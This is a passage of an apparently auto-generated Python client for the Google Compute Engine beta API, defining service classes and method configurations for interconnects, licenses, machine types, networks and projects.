List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnectAttachments.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments',
request_field='',
request_type_name=u'ComputeInterconnectAttachmentsListRequest',
response_type_name=u'InterconnectAttachmentList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified interconnect attachment with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeInterconnectAttachmentsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.interconnectAttachments.patch',
ordered_params=[u'project', u'region', u'interconnectAttachment'],
path_params=[u'interconnectAttachment', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{interconnectAttachment}',
request_field=u'interconnectAttachmentResource',
request_type_name=u'ComputeInterconnectAttachmentsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on an InterconnectAttachment. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeInterconnectAttachmentsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnectAttachments.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeInterconnectAttachmentsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInterconnectAttachmentsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnectAttachments.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInterconnectAttachmentsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class InterconnectLocationsService(base_api.BaseApiService):
"""Service class for the interconnectLocations resource."""
_NAME = u'interconnectLocations'
def __init__(self, client):
super(ComputeBeta.InterconnectLocationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the details for the specified interconnect location. Get a list of available interconnect locations by making a list() request.
Args:
request: (ComputeInterconnectLocationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectLocation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnectLocations.get',
ordered_params=[u'project', u'interconnectLocation'],
path_params=[u'interconnectLocation', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/interconnectLocations/{interconnectLocation}',
request_field='',
request_type_name=u'ComputeInterconnectLocationsGetRequest',
response_type_name=u'InterconnectLocation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of interconnect locations available to the specified project.
Args:
request: (ComputeInterconnectLocationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectLocationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnectLocations.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/interconnectLocations',
request_field='',
request_type_name=u'ComputeInterconnectLocationsListRequest',
response_type_name=u'InterconnectLocationList',
supports_download=False,
)
class InterconnectsService(base_api.BaseApiService):
"""Service class for the interconnects resource."""
_NAME = u'interconnects'
def __init__(self, client):
super(ComputeBeta.InterconnectsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified interconnect.
Args:
request: (ComputeInterconnectsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.interconnects.delete',
ordered_params=[u'project', u'interconnect'],
path_params=[u'interconnect', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/interconnects/{interconnect}',
request_field='',
request_type_name=u'ComputeInterconnectsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified interconnect. Get a list of available interconnects by making a list() request.
Args:
request: (ComputeInterconnectsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Interconnect) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnects.get',
ordered_params=[u'project', u'interconnect'],
path_params=[u'interconnect', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/interconnects/{interconnect}',
request_field='',
request_type_name=u'ComputeInterconnectsGetRequest',
response_type_name=u'Interconnect',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a Interconnect in the specified project using the data included in the request.
Args:
request: (ComputeInterconnectsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnects.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/interconnects',
request_field=u'interconnect',
request_type_name=u'ComputeInterconnectsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of interconnect available to the specified project.
Args:
request: (ComputeInterconnectsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnects.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/interconnects',
request_field='',
request_type_name=u'ComputeInterconnectsListRequest',
response_type_name=u'InterconnectList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified interconnect with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeInterconnectsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.interconnects.patch',
ordered_params=[u'project', u'interconnect'],
path_params=[u'interconnect', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/interconnects/{interconnect}',
request_field=u'interconnectResource',
request_type_name=u'ComputeInterconnectsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on an Interconnect. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeInterconnectsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnects.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/interconnects/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeInterconnectsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInterconnectsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnects.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/interconnects/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInterconnectsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class LicenseCodesService(base_api.BaseApiService):
"""Service class for the licenseCodes resource."""
_NAME = u'licenseCodes'
def __init__(self, client):
super(ComputeBeta.LicenseCodesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Return a specified license code. License codes are mirrored across all projects that have permissions to read the License Code.
Args:
request: (ComputeLicenseCodesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(LicenseCode) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.licenseCodes.get',
ordered_params=[u'project', u'licenseCode'],
path_params=[u'licenseCode', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/licenseCodes/{licenseCode}',
request_field='',
request_type_name=u'ComputeLicenseCodesGetRequest',
response_type_name=u'LicenseCode',
supports_download=False,
)
class LicensesService(base_api.BaseApiService):
"""Service class for the licenses resource."""
_NAME = u'licenses'
def __init__(self, client):
super(ComputeBeta.LicensesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified license.
Args:
request: (ComputeLicensesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.licenses.delete',
ordered_params=[u'project', u'license'],
path_params=[u'license', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/licenses/{license}',
request_field='',
request_type_name=u'ComputeLicensesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified License resource.
Args:
request: (ComputeLicensesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(License) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.licenses.get',
ordered_params=[u'project', u'license'],
path_params=[u'license', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/licenses/{license}',
request_field='',
request_type_name=u'ComputeLicensesGetRequest',
response_type_name=u'License',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Create a License resource in the specified project.
Args:
request: (ComputeLicensesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.licenses.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/licenses',
request_field=u'license',
request_type_name=u'ComputeLicensesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of licenses available in the specified project. This method does not get any licenses that belong to other projects, including licenses attached to publicly-available images, like Debian 8. If you want to get a list of publicly-available licenses, use this method to make a request to the respective image project, such as debian-cloud or windows-cloud.
Args:
request: (ComputeLicensesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(LicensesListResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.licenses.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/licenses',
request_field='',
request_type_name=u'ComputeLicensesListRequest',
response_type_name=u'LicensesListResponse',
supports_download=False,
)
class MachineTypesService(base_api.BaseApiService):
"""Service class for the machineTypes resource."""
_NAME = u'machineTypes'
def __init__(self, client):
super(ComputeBeta.MachineTypesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of machine types.
Args:
request: (ComputeMachineTypesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(MachineTypeAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.machineTypes.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/machineTypes',
request_field='',
request_type_name=u'ComputeMachineTypesAggregatedListRequest',
response_type_name=u'MachineTypeAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified machine type. Gets a list of available machine types by making a list() request.
Args:
request: (ComputeMachineTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(MachineType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.machineTypes.get',
ordered_params=[u'project', u'zone', u'machineType'],
path_params=[u'machineType', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/machineTypes/{machineType}',
request_field='',
request_type_name=u'ComputeMachineTypesGetRequest',
response_type_name=u'MachineType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of machine types available to the specified project.
Args:
request: (ComputeMachineTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(MachineTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.machineTypes.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/machineTypes',
request_field='',
request_type_name=u'ComputeMachineTypesListRequest',
response_type_name=u'MachineTypeList',
supports_download=False,
)
class NetworksService(base_api.BaseApiService):
"""Service class for the networks resource."""
_NAME = u'networks'
def __init__(self, client):
super(ComputeBeta.NetworksService, self).__init__(client)
self._upload_configs = {
}
def AddPeering(self, request, global_params=None):
"""Adds a peering to the specified network.
Args:
request: (ComputeNetworksAddPeeringRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddPeering')
return self._RunMethod(
config, request, global_params=global_params)
AddPeering.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.addPeering',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/networks/{network}/addPeering',
request_field=u'networksAddPeeringRequest',
request_type_name=u'ComputeNetworksAddPeeringRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified network.
Args:
request: (ComputeNetworksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.networks.delete',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/networks/{network}',
request_field='',
request_type_name=u'ComputeNetworksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified network. Get a list of available networks by making a list() request.
Args:
request: (ComputeNetworksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Network) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.networks.get',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{network}',
request_field='',
request_type_name=u'ComputeNetworksGetRequest',
response_type_name=u'Network',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a network in the specified project using the data included in the request.
Args:
request: (ComputeNetworksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/networks',
request_field=u'network',
request_type_name=u'ComputeNetworksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of networks available to the specified project.
Args:
request: (ComputeNetworksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(NetworkList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.networks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/networks',
request_field='',
request_type_name=u'ComputeNetworksListRequest',
response_type_name=u'NetworkList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified network with the data included in the request. Only the following fields can be modified: routingConfig.routingMode.
Args:
request: (ComputeNetworksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.networks.patch',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/networks/{network}',
request_field=u'networkResource',
request_type_name=u'ComputeNetworksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def RemovePeering(self, request, global_params=None):
"""Removes a peering from the specified network.
Args:
request: (ComputeNetworksRemovePeeringRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemovePeering')
return self._RunMethod(
config, request, global_params=global_params)
RemovePeering.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.removePeering',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/networks/{network}/removePeering',
request_field=u'networksRemovePeeringRequest',
request_type_name=u'ComputeNetworksRemovePeeringRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SwitchToCustomMode(self, request, global_params=None):
"""Switches the network mode from auto subnet mode to custom subnet mode.
Args:
request: (ComputeNetworksSwitchToCustomModeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SwitchToCustomMode')
return self._RunMethod(
config, request, global_params=global_params)
SwitchToCustomMode.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.switchToCustomMode',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/networks/{network}/switchToCustomMode',
request_field='',
request_type_name=u'ComputeNetworksSwitchToCustomModeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeNetworksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeNetworksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(ComputeBeta.ProjectsService, self).__init__(client)
self._upload_configs = {
}
def DisableXpnHost(self, request, global_params=None):
"""Disable this project as a shared VPC host project.
Args:
request: (ComputeProjectsDisableXpnHostRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DisableXpnHost')
return self._RunMethod(
config, request, global_params=global_params)
DisableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.disableXpnHost',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/disableXpnHost',
request_field='',
request_type_name=u'ComputeProjectsDisableXpnHostRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DisableXpnResource(self, request, global_params=None):
"""Disable a serivce resource (a.k.a service project) associated with this host project.
Args:
request: (ComputeProjectsDisableXpnResourceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DisableXpnResource')
return self._RunMethod(
config, request, global_params=global_params)
DisableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.disableXpnResource',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/disableXpnResource',
request_field=u'projectsDisableXpnResourceRequest',
request_type_name=u'ComputeProjectsDisableXpnResourceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def EnableXpnHost(self, request, global_params=None):
"""Enable this project as a shared VPC host project.
Args:
request: (ComputeProjectsEnableXpnHostRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('EnableXpnHost')
return self._RunMethod(
config, request, global_params=global_params)
EnableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.enableXpnHost',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/enableXpnHost',
request_field='',
request_type_name=u'ComputeProjectsEnableXpnHostRequest',
response_type_name=u'Operation',
supports_download=False,
)
def EnableXpnResource(self, request, global_params=None):
"""Enable service resource (a.k.a service project) for a host project, so that subnets in the host project can be used by instances in the service project.
Args:
request: (ComputeProjectsEnableXpnResourceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('EnableXpnResource')
return self._RunMethod(
config, request, global_params=global_params)
EnableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.enableXpnResource',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/enableXpnResource',
request_field=u'projectsEnableXpnResourceRequest',
request_type_name=u'ComputeProjectsEnableXpnResourceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Project resource.
Args:
request: (ComputeProjectsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Project) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.projects.get',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}',
request_field='',
request_type_name=u'ComputeProjectsGetRequest',
response_type_name=u'Project',
supports_download=False,
)
def GetXpnHost(self, request, global_params=None):
"""Gets the shared VPC host project that this project links to. May be empty if no link exists.
Args:
request: (ComputeProjectsGetXpnHostRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Project) The response message.
"""
config = self.GetMethodConfig('GetXpnHost')
return self._RunMethod(
config, request, global_params=global_params)
GetXpnHost.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.projects.getXpnHost',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/getXpnHost',
request_field='',
request_type_name=u'ComputeProjectsGetXpnHostRequest',
response_type_name=u'Project',
supports_download=False,
)
def GetXpnResources(self, request, global_params=None):
"""Gets service resources (a.k.a service project) associated with this host project.
Args:
request: (ComputeProjectsGetXpnResourcesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ProjectsGetXpnResources) The response message.
"""
config = self.GetMethodConfig('GetXpnResources')
return self._RunMethod(
config, request, global_params=global_params)
GetXpnResources.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.projects.getXpnResources',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/getXpnResources',
request_field='',
request_type_name=u'ComputeProjectsGetXpnResourcesRequest',
response_type_name=u'ProjectsGetXpnResources',
supports_download=False,
)
def ListXpnHosts(self, request, global_params=None):
"""Lists all shared VPC host projects visible to the user in an organization.
Args:
request: (ComputeProjectsListXpnHostsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(XpnHostList) The response message.
"""
config = self.GetMethodConfig('ListXpnHosts')
return self._RunMethod(
config, request, global_params=global_params)
ListXpnHosts.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.listXpnHosts',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/listXpnHosts',
request_field=u'projectsListXpnHostsRequest',
request_type_name=u'ComputeProjectsListXpnHostsRequest',
response_type_name=u'XpnHostList',
supports_download=False,
)
def MoveDisk(self, request, global_params=None):
"""Moves a persistent disk from one zone to another.
Args:
request: (ComputeProjectsMoveDiskRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('MoveDisk')
return self._RunMethod(
config, request, global_params=global_params)
MoveDisk.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.moveDisk',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/moveDisk',
request_field=u'diskMoveRequest',
request_type_name=u'ComputeProjectsMoveDiskRequest',
response_type_name=u'Operation',
supports_download=False,
)
def MoveInstance(self, request, global_params=None):
"""Moves an instance and its attached persistent disks from one zone to another.
Args:
request: (ComputeProjectsMoveInstanceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('MoveInstance')
return self._RunMethod(
config, request, global_params=global_params)
MoveInstance.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.moveInstance',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/moveInstance',
request_field=u'instanceMoveRequest',
request_type_name=u'ComputeProjectsMoveInstanceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetCommonInstanceMetadata(self, request, global_params=None):
"""Sets metadata common to all instances within the specified project using the data included in the request.
Args:
request: (ComputeProjectsSetCommonInstanceMetadataRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetCommonInstanceMetadata')
return self._RunMethod(
config, request, global_params=global_params)
SetCommonInstanceMetadata.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.setCommonInstanceMetadata',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/setCommonInstanceMetadata',
